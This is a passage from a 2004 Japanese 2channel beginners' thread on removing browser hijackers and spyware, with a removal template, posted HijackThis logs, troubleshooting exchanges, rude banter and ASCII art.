6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

224 :ひよこ名無しさん:04/05/19 19:53 ID:???
>>222
スキャンしたソフトで削除してもらえよ

225 :ひよこ名無しさん:04/05/19 19:56 ID:???
なるほど。

226 :222:04/05/19 20:03 ID:11eAZ+cb
>>224
http://security.symantec.com/sscv6/default.asp?productid=symhome&langid=jp&venid=sym

ここでスキャンしたんですが、あとどうすれば良いかわかりません。

227 :ひよこ名無しさん:04/05/19 20:05 ID:???
>>226
ノートン持ってないの?
持ってなかったら買って下さい

228 :ひよこ名無しさん:04/05/19 20:05 ID:???
>>231

↓IE
↓ヘルプ
↓目次とキーワード
↓検索
↓Cookie
Cookie とは 及び関連項目参照 大きすぎて貼れない。

以上。この位自分で出来るようになりましょう。
誰かが教えてくれる・・・では上達しませんよ。 先ずはヘルプが使えて一人前。

229 :222:04/05/19 20:06 ID:11eAZ+cb
>>227
買わないとだめなんですか?

230 :ひよこ名無しさん:04/05/19 20:06 ID:???
???????????????????

231 :ひよこ名無しさん:04/05/19 20:06 ID:???
>>228
(・∀・)ニヤニヤ

232 :ひよこ名無しさん:04/05/19 20:08 ID:???
>>229
シマンテックは慈善事業はしておりません

233 :222:04/05/19 20:09 ID:11eAZ+cb
>>232
このまま放ってたらどうなりますか?

234 :ひよこ名無しさん:04/05/19 20:10 ID:???
>>229
とりあえずお金がなく 時間だけがある人はOSの再インストールをしてください

235 :ひよこ名無しさん:04/05/19 20:10 ID:???
>229
オンラインスキャンにはウィルス駆除機能がないから
「どうしたらいいんですか」と質問するくらいなら金出して駆除もしてくれるソフト買え。
買うつもりがないなら質問するな。

236 :ひよこ名無しさん:04/05/19 20:11 ID:???
シマンテック(・A・)イクナイ!!

237 :ひよこ名無しさん:04/05/19 20:12 ID:???
>>229
削除するだけで済むウイルスもあればレジストリを改変するウイルスもある
自分で修復するスキルと時間があれば自分でする
それば無ければ金がいる

238 :ひよこ名無しさん:04/05/19 20:14 ID:???
>>233
このまま使いたいのならネットには二度とつながないでください
被害は自分だけでおさえてください  
性病のまSEXはしないでください

239 :ひよこ名無しさん:04/05/19 20:15 ID:???
トレンドマイクロ(・∀・)イイ!! 

240 :222:04/05/19 20:17 ID:11eAZ+cb
じゃあ、ソフトをネットの通販で買おうと思いますが
お勧めのソフトや通販サイトありますか?

241 :ひよこ名無しさん:04/05/19 20:20 ID:???
ttp://pc5.2ch.net/test/read.cgi/sec/1082313491/

242 :ひよこ名無しさん:04/05/19 20:21 ID:???
ノートン2004(・A・)イクナイ!!
2003(・∀・)イイ!!

243 :ひよこ名無しさん:04/05/19 20:24 ID:???
その程度も調べられないならネット接続しないほうがイイヨ。

244 :ひよこ名無しさん:04/05/19 20:27 ID:???
>>240
自分がスキャンしたサイトが何なのかも解ってないのか・・・ハァー

245 :ひよこ名無しさん:04/05/19 20:28 ID:???
>>240

ウイルス対策ソフト比較

http://www10.plala.or.jp/palm84/antivirus.html

246 :ひよこ名無しさん:04/05/19 21:05 ID:???
>>222
つーか、スレ違いな

247 :222:04/05/19 21:13 ID:???
                 ┌─┐
                 |も.|
                 |う |
                 │来│
                 │ね│
                 │え .|
                 │よ .|
      バカ    ゴルァ   │ !!.│
                 └─┤    プンプン
    ヽ(`Д´)ノ ヽ(`Д´)ノ  (`Д´)ノ    ( `Д)
    | ̄ ̄ ̄|─| ̄ ̄ ̄|─| ̄ ̄ ̄|─□( ヽ┐U
〜 〜  ̄◎ ̄  . ̄◎ ̄   ̄◎ ̄   ◎−>┘◎

248 :ひよこ名無しさん:04/05/19 21:30 ID:???
あたりめーだよ。スレ違いなんだから。

249 :222:04/05/19 21:44 ID:11eAZ+cb
>>247
は別人ですけど。

250 :ひよこ名無しさん:04/05/19 21:49 ID:???
んなことみんな知ってるわ。

251 :名無しさん@書き込み中:04/05/19 21:53 ID:???
インターネットをひらくと最初の画面で必ず
http://prosearching.com/passthrough/index.html?がホームと一緒に
でてきます。駆除もしたのですが治りません。
上に書いてあるものも全部やりました。でもダメです。
誰か教えてください。


252 :251 ◆x.g9GJKET2 :04/05/19 21:55 ID:???
もう一度テンプレ読んで実行したら、あっけなく直りました。
お騒がせいたしました。

253 :名無しさん@書き込み中:04/05/19 21:57 ID:???
251です。
ogfile of HijackThis v1.97.7
Scan saved at 21:34:37, on 2004/05/19
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\sony\VAIO Media Music Server\SSSvr.exe
C:\Program Files\Sony\Photo Server 20\appsrv\PicAppSrv.exe
C:\WINDOWS\wanmpsvc.exe
C:\Program Files\Common Files\Sony Shared\VAIO Media Platform\SV_Httpd.exe
C:\Program Files\Common Files\Sony Shared\VAIO Media Platform\sv_httpd.exe
C:\Program Files\Common Files\Sony Shared\VAIO Media Platform\UPnPFramework.exe
C:\Program Files\Common Files\Sony Shared\VAIO Media Platform\UPnPFramework.exe


254 :ぼるじょあ ◆yBEncckFOU :04/05/19 21:58 ID:???
>>252
(・3・) エェー 解決おめでd

255 :251:04/05/19 21:58 ID:???
解決しました

256 :251:04/05/19 22:00 ID:???
解決したって言ってんだろ!>>253偽者ウザイ氏ね。

257 :名無しさん@書き込み中:04/05/19 22:01 ID:???
C:\WINDOWS\Explorer.EXE
C:\Program Files\Apoint\Apoint.exe
C:\WINDOWS\System32\ICO.EXE
C:\WINDOWS\System32\ezSP_Px.exe
C:\Program Files\Drag'n Drop CD\BinFiles\DragDrop.exe
C:\PROGRA~1\NORTON~1\navapw32.exe
C:\Program Files\Apoint\Apntex.exe
C:\Program Files\Sony\VAIO Update\VAIOUpdt.exe
C:\WINDOWS\System32\conime.exe
C:\PROGRA~1\FORDER~1\DVD OPTION START.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\FinePixViewer\QuickDCF.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Kota Fukuda\デスクトップ\higaitaisaku.exe

F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: (no name) - {0204BF12-7A91-2672-26FF-58533F1533A6} - C:\PROGRA~1\SUPPOR~1\Puredog.dll (file missing)
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Byteclosehole - {5677DCD6-5E99-E7D1-4967-AFA060970240} - C:\PROGRA~1\SUPPOR~1\Puredog.dll (file missing)


258 :251:04/05/19 22:02 ID:???
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [Norton Auto-Protect] C:\PROGRA~1\NORTON~1\NAVAPW32.EXE /LOADQUIET
O4 - HKLM\..\Run: [gnetmous] C:\GMOUSE\gnetmous.exe
O4 - HKLM\..\Run: [eoneMng] C:\WINDOWS\eonemng.exe
O4 - HKLM\..\Run: [SoundFusion] RunDll32 cwcprops.cpl,CrystalControlWnd
O4 - HKLM\..\Run: [SM Unplug] SMUnplug.exe
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [Upgrade Service] C:\WINDOWS\winupd.exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [MDM7] "C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE"
O4 - HKCU\..\Run: [ctfmon.exe] ctfmon.exe
O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Startup: めもりーくりーなー.lnk = C:\Program Files\mclean\MClean.exe

259 :ひよこ名無しさん:04/05/19 22:02 ID:???
Logfile of HijackThis v1.97.7
Scan saved at 17:21:01, on 04/05/18
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCEVTMGR.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCSETMGR.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\EONEMNG.EXE
C:\WINDOWS\SMUNPLUG.EXE
C:\PROGRAM FILES\LOGICOOL\MOUSEWARE\SYSTEM\EM_EXEC.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCPD-LC\SYMLCSVC.EXE
C:\PROGRAM FILES\COMMON FILES\SYMANTEC SHARED\CCAPP.EXE
C:\WINDOWS\SYSTEM\CTFMON.EXE
C:\PROGRAM FILES\MCLEAN\MCLEAN.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\デスクトップ\HIGAITAISAKU\HIGAITAISAKU.EXE

260 :ひよこ名無しさん:04/05/19 22:03 ID:???
正直、来てさっそく貼り付けられるのは勘弁って感じです。

261 :251:04/05/19 22:04 ID:???
R3 - URLSearchHook: (no name) - _{5D60FF48-95BE-4956-B4C6-6BB168A70310} - (no file)
F0 - syst>m.ini: Shell=
F0 - R >ystem.ini: Shel>=
F0 - R >ystem.ini: UserInit=
O2 - BHO: IDN Helper Object - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINNT\DOWNLO~1\CNSMIN~1.DLL
O2 - BHO: (no name) - {4A6A44F7-F7A6-4AA0-89EC-7CADE56973AC} - C:\WINNT\nqrkc.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint\Apoint.exe
O4 - HKLM\..\Run: [HKSERV.EXE] C:\Program Files\Sony\HotKey Utility\HKserv.exe
O4 - HKLM\..\Run: [JOGSERV2.EXE] C:\Program Files\Sony\Jog Dial Utility\JogServ2.exe
O4 - HKLM\..\Run: [Adaptec DirectCD] C:\PROGRA~1\Adaptec\DirectCD\directcd.exe
O4 - HKLM\..\Run: [OmgStartup] C:\Program Files\Common Files\Sony Shared\OpenMG\OmgStartup.exe
O4 - HKLM\..\Run: [imjpmig] C:\Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
O4 - HKLM\..\Run: [Kernel32] C:\WINNT\SYSTEM\Kernel32.dll
O4 - HKLM\..\Run: [savemeet] C:\PROGRA~1\BROWSE~1\file01bits.exe
O4 - HKLM\..\Run: [nueg] C:\WINNT\rnjfbifa.exe
O4 - HKLM\..\Run: [webHancer Survey Companion] "C:\Program Files\webHancer\Programs\whSurvey.exe"
O4 - HKCU\..\Run: [ctfmon.exe] ctfmon.exe


262 :ひよこ名無しさん:04/05/19 22:04 ID:???
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb05.exe
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\Winampa.exe"
O4 - HKLM\..\Run: [Services Process] C:\WINDOWS\system32\config\services.exe
O4 - HKLM\..\Run: [Sixth Beep] C:\PROGRA~1\Roam Eq Defy\bin noun.exe
O4 - HKLM\..\Run: [RunDLL] rundll32.exe "C:\WINDOWS\Downloaded Program Files\bridge.dll",Load
O4 - HKLM\..\Run: [msbb] c:\docume~1\hide\locals~1\temp\msbb.exe
O4 - HKLM\..\Run: [mdmfyx] C:\WINDOWS\mdmfyx.exe
O4 - HKLM\..\Run: [xpsystem] C:\WINDOWS\System32\services\wmplayer.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [xpsystem] C:\WINDOWS\System32\services\wmplayer.exe
O4 - Startup: 20030628.txt
O4 - Startup: 20030629.txt
O4 - Startup: 20030630.txt
O4 - Startup: 20040213.txt
O4 - Startup: 20040327.txt
O4 - Startup: 20040422.txt
O4 - Startup: connected.txt
O4 - Startup: NTUSER.DAT
O4 - Startup: ntuser.dat.LOG
O4 - Startup: ntuser.ini
O4 - Startup: デスクトップ.html
O8 - Extra context menu item: Ascii Art Editorで編集(&A) - C:\Documents and Settings\HIDE\
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: ちょこっと httpオープン - C:\Documents and Settings\HIDE

263 :251 ◆x.g9GJKET2 :04/05/19 22:06 ID:???
名前欄に「251#251」で、キミも今日から 251 ◆x.g9GJKET2 だYO


264 :251 ◆x.g9GJKET2 :04/05/19 22:08 ID:???
なんか最近コピペばかりで嫌だね

265 :251 ◆x.g9GJKET2 :04/05/19 22:09 ID:???
質問者が>>1も読まずID出さないからもう無茶苦茶

266 :251 ◆x.g9GJKET2 :04/05/19 22:13 ID:???
相変わらず学習能力ゼロのマスカキ猿が集まってますな、ここは。

267 :ひよこ名無しさん:04/05/19 22:15 ID:???
他スレで読んで気になっていたa2というトロイ検出に特化したアプリ入れてみた。
http://www.a-2.org/en/

↓5.9.2004の最新データで検出数
Trojans 20454
Dialer 3829
Worms 1586
Spyware 11
Viruses 0

プログラムはサイトの左上にあるDownloadからa2 freeを選べばOK
インストール時に訪ねられるCodeはCreate Accountから取得(捨てアド可)
そのまま最新定義のアップデートまで行われるので立ち上げ直してから、
一番上にあるScan your computer for Malware infectionsをクリック

最近のここの症状はSpywareでは括れないようなものも多いので、
ここのテンプレ関係を全てやってみても症状が改善されないヤツは
三種の神器と併せて試してみるのも良いんじゃないだろか?

検出されなかったので何とも言えないが、削除までやってくれるみたいだし。

268 :251 ◆x.g9GJKET2 :04/05/19 22:15 ID:???
(251)ノ 次の方どうぞ!

269 :ひよこ名無しさん:04/05/19 22:29 ID:???
新種のトロイ???
ttp://www.geocities.co.jp/SiliconValley/3657/windows/


270 :251:04/05/20 00:05 ID:???
             (  ヽ      ――――  ○  ――――
     , ⌒ヽ    (   __   )       // | \
    (  - - = = ≡≡≡\   \ ヽ⌒ヽ 、 / / |    \
    ゝ    ` - = = ≡≡\ も\    )       | (⌒ 、
   (           - = ≡≡\ う \    ヽ     (     ヽ
  (    (⌒        - = ≡\ 来\    )   (
_______________________________________ - =≡\ ね\_______________________________________________________________________
                       -\ え\
 〜      〜〜      〜      \ よ\ 〜       〜〜〜   〜
            ドコイクンダーヨ  オイオイ  \  \
                             ̄ ̄\ ケエルゾ! ゴラァ∬∬
    - = = ≡≡ ヽ(|||゚Д゚)ノ- =ヽ(゚Д゚|||)ノ  - =( `Д´)ノ- = ≡ソ(♯`Д)
             | ̄ ̄ ̄|──| ̄ ̄ ̄|──| ̄ ̄ ̄|───□( ヽ┐U
       ミミミミミミ〜〜〜〜 ミ〜〜〜〜 ミ〜〜〜〜 ミミミ〜〜〜〜〜
                                       ザブザブ
〜〜  〜〜 〜    〜   〜〜〜   〜〜〜 〜   〜〜〜〜 〜〜〜
 〜   〜〜〜   〜〜  〜〜〜〜〜   〜   〜    〜    〜  〜
〜        〜          〜     〜    〜      〜 〜  〜

271 :251:04/05/20 00:08 ID:???
             (  ヽ       ――――  ○  ――――
     , ⌒ヽ    (     )       .┌─┐// | \
    (    '   (      . ヽ⌒ヽ 、 .|も.| / |    \   (⌒ ⌒、
    ゝ    `ヽ(       .       )|う |    | (⌒ 、  (     )
   (           .、⌒         │来│   (     ヽ        ヽ
  (    (⌒        .         .│れ│  (
_______________________________________________________.│ね│________________________________________________________________
                         .|え│
 〜      〜〜      〜       │よ│ 〜       〜〜〜   〜
       シズンデルッテ   オイオイ     │ !!.│    プンプン
                     ヤベーヨ └─┤       ∬∬
       ヽ(|||゚Д゚)ノ  ヽ(゚Д゚|||)ノ     (゚Д゚|||)ノ     (♯`Д)
 ミミミミミミ〜〜〜〜 ミ〜〜〜〜   ミ〜〜〜〜 ミミミ〜〜〜〜
                                     ザブザブ


272 :ひよこ名無しさん:04/05/20 00:26 ID:vNg4hALN
IEを開くたびに海外のサイトになってしまったのでテンプレのを一通りしたら直りました。
IEを開いたら真っ白のページになったのでホームを元のYAHOOに戻して完了!と思ったら
次にPCを起動させたときに、IEを開いたら真っ白のページになったました。
何度設定しなしても再起動する度に真っ白のページに戻ります。

まだ、駆除できてないんでしょうか?



273 :251 ◆x.g9GJKET2 :04/05/20 00:35 ID:???
>>270-271
ズレてやんのププッ

274 :272:04/05/20 00:47 ID:vNg4hALN
ちなみにウイルスバスターではTROJ_BUDDYLINK.Aってのが反応して
駆除できませんでした と出たので手動削除を
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_BUDDYLINK.A
を見ながらやりました。

275 :ひよこ名無しさん:04/05/20 00:48 ID:???
>>274
(´ι _`  )アッソ

276 :ひよこ名無しさん:04/05/20 00:52 ID:???
>>274
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、自分でしたことと結果を明記。

277 :272:04/05/20 01:02 ID:vNg4hALN
OSはXPです。  ウイルスバスター2004があります。 
やったことは何度もでてくる海外のサイトの下のほうに小さいリンクがあってそこからアンインストしました。
あとはGWShredderを実行して あなたのシステムは完全にキレイでした。 と出ました。

278 :272:04/05/20 01:03 ID:vNg4hALN
あとHijackThis もしてみました。

279 :ひよこ名無しさん:04/05/20 01:33 ID:???
             (  ヽ       ――――  ○  ――――
     , ⌒ヽ    (     )            // | \
    (    '   (      . ヽ⌒ヽ 、 .      / |    \   (⌒ ⌒、
    ゝ    `ヽ(       .       )        | (⌒ 、  (     )
   (           .、⌒                (     ヽ        ヽ
  (    (⌒        .         .      (
_______________________________________________________________________________________________________________________
                         .
 〜      〜〜      〜           〜       〜〜〜   〜


      ブクブクブク  ブクブクブク    ブクブクブク    ブクブクブク
 ミミミミミミ〜〜〜〜 ミ〜〜〜〜   ミ〜〜〜〜 ミミミ〜〜〜〜
        ∵∵    ∵∵        ∵∵       ∵∵


280 :ひよこ名無しさん:04/05/20 01:45 ID:???
>>273
ズレてないだろ文字サイズ中にしてみろ。

281 :272:04/05/20 02:04 ID:vNg4hALN
まだ直りません・・・
Ad-aware 6.0 Build181 もして怪しいのをすべて削除しました。


282 :ひよこ名無しさん:04/05/20 02:13 ID:???
http://higaitaisaku.web.infoseek.co.jp/cgi-bin/cbbs.cgi

283 :ひよこ名無しさん:04/05/20 02:43 ID:Pn29EyS5
すいません。
こちらのスレの昔のテンプレであった
「スタート」→「ファイル名を指定して実行」を使って
ホームページを勝手に飛ばされるのを直す方法は何処で見れますか?
以前に、その方法で直したのですが(Win98),現在、テンプレやまとめサイトを
みると他の方法しかありません。
当方、いまだにWim98です。

よろしくお願いします。

284 :定期貼り v4.3  Hijackthisログいきなり貼りお断り:04/05/20 02:50 ID:???
▼━ 質問の仕方 ━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の★発言(レス)番号を入力。
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、やってみたことを明記。

 1)このスレのテンプレは★まとめサイト http://haiiro.info/my/text/template.html
  が見やすいです。(セキュリティ関係の情報サイト「スターマジック」の「はいいろ」
  さんのご好意で作成されています。感謝)

 2)まず>>3か「まとめサイト」の★応急処置できるとこまでやってみてください。
   Me/XPの人は★8)「システムの復元」を試してください。これで8割は解決
   するはず。な〜んにもしないで質問するとネタ回答食う可能性大w

 3)迷惑ソフトはまず「プログラム(アプリケーション)の追加と削除」からアンインスト
   できないか確認。googleで「迷惑なヤシの名 + uninstall または uninstaller」で
   公式アンインストーラがヒットすることもあります。最後にゴミをHijackthisで処理

 4)2ch他スレ、その他質問サイトとの★マルチポスト(同時に質問)は禁止です。
   回答者に誘導されたか、または質問取り下げた後で移動してください。

 5)ハイジャッカーの99%はIE以外では作動しません。IEの部品を利用しないブラウザ
   Opera http://www.jp.opera.com/ やFirefox http://jt.mozilla.gr.jp/products/firefox/
  を利用するとトラブルを防げるし、IEがハイジャックされたときの非常口になります。

 6)Spybot S&Dが1.3にバージョンアップ。常駐監視機能や高度なシステム情報
   レポート機能がつきました。日本語対応です。>>643-644

 7)Hijackthisのログを説明もなしにいきなり貼ってくる人がいますが、普段もよその
   家に黙って上がり込んで冷蔵庫からリポビタンD出して飲んだりしてるんですか?

285 :ひよこ名無しさん:04/05/20 02:54 ID:???
>>283
スタート→ファイル名を指定して実行

で実行できるファイルだって? そりゃー全ての実行ファイル
だからなー。ちと難しいな。他をあたってくれよ。ミナトノヨーコヨコハマ

286 :ひよこ名無しさん:04/05/20 03:00 ID:Pn29EyS5
>>285
えーと、数年前のここのスレのテンプレにあったんですけど・・・
「ファイル名を指定して実行」でファイル名(この名前を忘れました)
を入力して、1つずつ表示されるチェックを外して再起動
これを繰り返してホームが飛ばされなくなるまで繰り返すと・・・。
Wim98用の方法だったんでは?
というのも、まとめサイトの方法だと98には当てはまらないみたいなので。

287 :286:04/05/20 03:16 ID:Pn29EyS5
よ〜く考えて自分で思い出しました。
「msconfig」をファイル名を指定して実行に入力して
やるんだった。なんとか記憶に頼ってやってみます。

288 :ひよこ名無しさん:04/05/20 03:17 ID:???
Q11:インターネットオプションで直しても、再起動するとまた戻ってる!
A11:スタート>ファイル名を指定して実行>msconfig>スタートアップの項目に
  ついてるチェックを全て外して再起動。
  再起動したら、今度は1つずつチェックを戻していって、エロなホームページ
  になるかどうかを確認していく。何度も根気強くmsconfigと再起動を繰り返して
  最終的には最初にチェックを外したやつのほとんどはチェックが戻り、僅かなエ
  ロサイト関連のものだけチェックが外れた状態になればOK!
  ※Windows95とWindows2000はmsconfigが無いので窓の手を使用するかレジストリの
  run項目をチェック。これで直ったなら怪しい自動実行プログラムを削除。

289 :ひよこ名無しさん:04/05/20 03:19 ID:???
Q11の補足説明

■=チェック済 □=チェック無で解説

1:全部チェック外す
□adosh
□ghohga
□mojgoj            ※症状は出ない

2:1つずつチェック入れていく
■adosh
□ghohga
□mojgoj            ※症状は出ない

3:1つずつチェック入れていく
■adosh
■ghohga
□mojgoj            ※症状がキタ━━━━━━(゚∀゚)━━━━━━!!!!

4:1つずつチェック入れていく
■adosh
■ghohga
■mojgoj            ※症状が出たまま

5:症状を出すやつが特定出来たので、症状と関係ないもののチェックを戻す
■adosh
□ghohga
■mojgoj

6:終了

290 :ひよこ名無しさん:04/05/20 03:20 ID:???

懐かしいね。

291 :286:04/05/20 03:24 ID:Pn29EyS5
>>288 >>289
おお!それです。
わざわざこんな夜中に有り難うございます。

実は今、「システム設定ユーティリティー msconfig」でググって
これを見つけたところです。
今、コピペしていただいたのと、このページを参照して
やってみます。ほんと有り難うです!!
ttp://dynabook.com/assistpc/faq/pcdata/002477.htm

292 :ひよこ名無しさん:04/05/20 03:36 ID:???


293 :ひよこ名無しさん:04/05/20 03:40 ID:???
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      |   マスター、今夜は古馴染みのお客さんが飲みに来てるね♪
       レヽ___________________
   ∧_∧        ∧_∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (  ・∀) / ̄ヽ  (´∀`  ) < ゆっくりしてって下さいモナ
   (   `つ 日 凸 ( つ つヽ  \________________
   (_ ⌒./   凵ヽ | | | |ヽ.凸|   |
   「  (_/Y     ヽ _(__) | |\|   |
  ┗┳━| ̄ ̄ ̄ ̄ ̄|    ..   \|. │  |
    ┻\|        .|        \.|   │

294 :ひよこ名無しさん:04/05/20 03:40 ID:???
>>285
>ちと難しいな。
>他をあたってくれよ。ミナトノヨーコヨコハマ

( ´,_ゝ`)プッ  

295 :285:04/05/20 03:45 ID:???
                 ┌─┐
                 |も.|
                 |う |
                 │来│
                 │ね│
                 │え .|
                 │よ .|
      バカ    ゴルァ   │ !!.│
                 └─┤    プンプン
    ヽ(`Д´)ノ ヽ(`Д´)ノ  (`Д´)ノ    ( `Д)
    | ̄ ̄ ̄|─| ̄ ̄ ̄|─| ̄ ̄ ̄|─□( ヽ┐U
〜 〜  ̄◎ ̄  . ̄◎ ̄   ̄◎ ̄   ◎−>┘◎

296 :272:04/05/20 03:46 ID:vNg4hALN
>>282のabout:blankのところを読んでSpybotをインストして検索したらまた12個問題が見つかりすべてfixed
と表示されましたが、未だに再起動してもabout:blankのままです。

他には思い当たる事はありませんか 御願いします

297 :ひよこ名無しさん:04/05/20 03:50 ID:???
>>296
セーフモードでもう一度やるんだ。

298 :ひよこ名無しさん:04/05/20 03:58 ID:???
>>296
《応急処置》
WEB見ててブラウザが変になったらとりあえず以下を実行。ブラクラ、ジョークソフト、
ブラウザジャッカー、スパイウェアなどの迷惑ソフトの8割はこれで撃退できますよん。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

299 :272:04/05/20 04:22 ID:vNg4hALN
>>297
セーフモードでやってみたらまた2個見つかりました。
でも再起動してもabout:blankのままです。
>>298
全部試しましたが駄目でした。


ヽ(τωヽ)ノ モウダメポ


300 :ひよこ名無しさん:04/05/20 04:24 ID:???
>>299
>>46

301 :ひよこ名無しさん:04/05/20 04:28 ID:iGfL7swQ
こちらに誘導されたみたいです。エロサイトなんか見てないんですが・旦那が見てたんでしょうか?困ってます。教えてください。
パソコンでインターネットにつなぐときにヤフーにつながるようにしてるんですけど、今日つなげると
なんか変なサイトに勝手につながってしまいました。お気に入りにところには追加した覚えのないサイトがいっぱいあるし、削除しても削除しても
